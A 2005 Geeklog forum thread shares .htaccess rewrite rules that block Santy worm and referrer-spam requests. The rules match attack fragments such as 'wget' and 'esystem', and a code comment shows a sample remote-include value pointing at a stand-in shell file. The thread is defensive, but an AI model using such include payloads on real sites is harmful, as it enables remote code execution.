Subject: Blocking unwanted requests to reduce server load

Posted on: 01/01/05 05:21am
By: Dirk

Most tips to speed up a site revolve around optimizing SQL requests or throwing bigger and better hardware at the problem. But if you check your logfiles these days, you'll find a lot of nonsensical requests that can also have a quite dramatic negative impact on your site's performance. Here are a few tips on how to deal with them ...

Santy and other worms

The outbreak of the original Santy worm, which only attacked phpBB boards, was quickly followed by variants (now called Spyki or PhpInclude worm) that target all PHP scripts out there - including Geeklog.

The Spyki worm tries to exploit a common programming mistake in PHP scripts where the author includes another file based on some parameter passed in the URL. The worm simply tries to exploit this with a brute-force attack on all parameters it can find for a script.
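To illustrate the mistake (a hypothetical sketch, not Geeklog code - the names and filenames here are invented): in PHP it would be something like include($_GET['page']); modeled in Python below, together with the usual fix of only including names from a fixed allowlist.

```python
# Hypothetical sketch of the include-by-parameter mistake (names invented).
# In PHP this would be include($_GET['page']); here we only model the logic.

SAFE_PAGES = {"home": "home.tmpl", "about": "about.tmpl"}  # fixed allowlist

def include_unsafe(page_param):
    # Vulnerable: the attacker fully controls the filename,
    # e.g. ?page=http://evil.example/shell.txt
    return "include(%s)" % page_param

def include_safe(page_param):
    # Fixed: only filenames from the allowlist are ever included;
    # anything else gets a 404 instead of being executed.
    filename = SAFE_PAGES.get(page_param)
    return "include(%s)" % filename if filename else "404"
```

The worm doesn't know which scripts are vulnerable, so it simply throws attack URLs at every parameter of every PHP script it finds - which is why even a non-vulnerable site sees the load.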

Geeklog itself is not vulnerable to this attack (can't speak for all the existing plugins and other add-ons, but I'm not aware of any problems with them at the moment). But the sheer amount of requests caused by this worm can really slow down a Geeklog site.

So what can we do? The idea is to detect the worm's requests on the server before they're actually executed. That is, we use the webserver's abilities to catch these requests and make sure the PHP script they're trying to attack is not executed. This saves CPU time (for calling up the PHP interpreter) and DB load (for creating sessions, loading the blocks, etc.).

On geeklog.net, we currently use this in the site's .htaccess file:
# attempts to stop the Santy worm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

As explained above, this tries to detect patterns typical of the worm's requests and then redirects them to 127.0.0.1. While it is unlikely that the worm will even follow that redirect, it at least saves our webserver the trouble of having to execute the nonsensical request.
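As a rough sanity check of what the QUERY_STRING conditions catch, here are approximate Python equivalents (the real matching is done by mod_rewrite; the user-agent and cookie conditions are omitted, and unlike the rules above the patterns here are searched anywhere in the string, which is what the leading ^(.*) in the rules effectively does anyway):

```python
import re

# Rough Python equivalents of the QUERY_STRING conditions in the
# .htaccess snippet above. The worm's requests carry shell commands
# (wget) or PHP function fragments (chr/system via e-chr/e-system)
# in the query string.
WORM_PATTERNS = [
    re.compile(r"wget%20"),
    re.compile(r"echr"),
    re.compile(r"esystem"),
    re.compile(r"highlight=%2527"),
]

def looks_like_worm(query_string):
    # True if any of the telltale fragments appears in the query string.
    return any(p.search(query_string) for p in WORM_PATTERNS)
```

A normal Geeklog query string like topic=45359&mode=flat passes through untouched; only requests carrying the attack fragments are flagged.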

This is not the place to discuss and explain how Apache's mod_rewrite works. Check the Apache manual if you want to learn more about it.

The above rules are derived from similar ones you can find on the web. This site, for example, has similar rules for mod_security (an Apache 2 module) and also discusses some flaws in the above rules (but they seem to work for us for now ...).

Referrer spam

The same approach can also be used against that stupid referrer spam. If you check your logfiles, you'll often find requests allegedly coming from porn or mortgage sites. If you look closely, you'll notice that they only send one request for a story or a forum post, but don't load any images. So it's not someone actually following a link to your site, it's just a stupid bot trying to draw attention to that site.

Again, if those requests come in a lot, they can increase the server load quite a bit. So we use the same idea as for the worms to catch them before the PHP script is even executed:
# Referrer spam :-(
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
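The two HTTP_REFERER conditions translate to case-insensitive regexes roughly like these (a quick check in Python; note the dots are escaped here, while the rules above leave them unescaped so they'd match any character):

```python
import re

# Case-insensitive equivalents of the HTTP_REFERER conditions above.
# The listed domains are just the current batch of spam sites.
SPAM_REFERERS = [
    re.compile(r"^http://.*hosting4u\.gb\.com.*$", re.IGNORECASE),
    re.compile(r"^http://.*4free\.gb\.com.*$", re.IGNORECASE),
]

def is_referrer_spam(referer):
    # True if the Referer header matches any known spam domain.
    return any(p.match(referer) for p in SPAM_REFERERS)
```

Legitimate referrers, including empty ones, fall through and the request is served normally.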

The two URLs in this example are from a batch of sites that are being used in referrer spam at the moment. They will probably be gone in a few days or weeks and replaced by others.

That's the main problem with referrer spam: it's a moving target. So most of the time, I'd say don't bother and ignore it. Use the above only if you see a lot of requests and your server's load is increasing because of them.

404s and home-made problems

Some days ago, I was debugging a script and wondering why it caused SQL requests even after it had collected all the data it needed to display the page. The reason was that it was trying to load an image that wasn't there. And because I had set up Apache to use Geeklog's 404.php for the "404 Not Found" error message, it called up that script every time it couldn't find the image.

In case you're not aware, you can set up your own 404 page in a .htaccess like this:
ErrorDocument 404 /404.php

So now every time a file is not found, the error message comes nicely wrapped in Geeklog.

However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your server and your database. Check your logfiles regularly and try to fix those 404s.
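To find the worst offenders in your logfiles, a quick tally like this can help (a sketch assuming Apache's common log format, where the request is the quoted field and the status code follows it - adjust for your own log format):

```python
from collections import Counter

def count_404s(log_lines):
    # Tally requested paths that returned 404, assuming common log format:
    # host - - [date] "GET /path HTTP/1.0" 404 bytes
    counts = Counter()
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 3:
            continue
        request, after = parts[1], parts[2].split()
        if after and after[0] == "404":
            fields = request.split()  # e.g. ['GET', '/path', 'HTTP/1.0']
            if len(fields) >= 2:
                counts[fields[1]] += 1
    # Most frequently missing paths first
    return counts.most_common()
```

Running this over access_log shows at a glance which missing files (often a single broken image reference) are triggering 404.php over and over.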

Hope these tips help someone ...

bye, Dirk

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 06:08am
By: destr0yr

[QUOTE BY= Dirk]
Hope these tips help someone ...

bye, Dirk[/QUOTE]
Indeed they will. Thank you Dirk. Happy New Years!

HTTP_REFERER spam

Posted on: 01/01/05 10:01am
By: THEMike

I have a new version of my HTTP_REFERER module for Geeklog pending, just ironing out a couple of details. It integrates with spamX to detect referrer spam and ignore it for logging purposes. Additionally, I have an alternative config value for the spamX action: rather than sending the default one from your config.php, it sends its own configurable value. On top of that, I have a custom action for spamX that performs a die(); when spam is detected, and thus stops you wasting a single further CPU cycle on HTTP_REFERER spammers.

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 02:08pm
By: bcbrock

Obviously, the prudent thing to do is implement whatever preventative measures we can to ensure our individual sites are not affected - at least, not affected much. I wonder however, if a GL site that requires user logon to view or post content ( $_CONF['loginrequired'] = 1 ) is somewhat protected from Santy and other like worms???

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 02:26pm
By: Dirk

[QUOTE BY= bcbrock] I wonder however, if a GL site that requires user logon to view or post content ( $_CONF['loginrequired'] = 1 ) is somewhat protected from Santy and other like worms???[/QUOTE]
Depends on what you mean by "protected".

As I said, a Geeklog site cannot be infected by this worm. However, since the worm stupidly tries to call each and every PHP script it can find, your site's performance can certainly be affected. Login required or not - calling up the script and doing SQL requests only to display a "you have to be logged in" error message will have a certain impact on the load of your webserver and database.

The method described above tries to ease that load by deflecting the worm's requests.

Anyone remember the Code Red worm that attacked Microsoft's IIS webservers some years ago? It couldn't infect Apache webservers, but still caused server load and annoying logfile entries there. As with the Santy worm, there's nothing you can do at your end to actually stop those attacks (other than taking down your site ...). All you can do is try to minimize the impact they have on your site / server.

bye, Dirk

Blocking unwanted requests to reduce server load

Posted on: 01/01/05 11:43pm
By: machinari

[QUOTE BY= Dirk]So now every time a file is not found, the error message comes nicely wrapped in Geeklog.

However, that also means that every 404 causes the execution of a PHP script and requests to the database. So if you have a lot of 404s, you're creating a lot of load for both your server and your database. Check your logfiles regularly and try to fix those 404s.
[/QUOTE]yes yes, 404s were being returned for most of that nasty worm's requests. so scripts were running and the db was taking a hit (cuz i was using gl's 404.php). just now implemented some of the above rewrite rules... looking forward to positive results. thanks Dirk.

Geeklog - Forum
https://www.geeklog.net/forum/viewtopic.php?showtopic=45359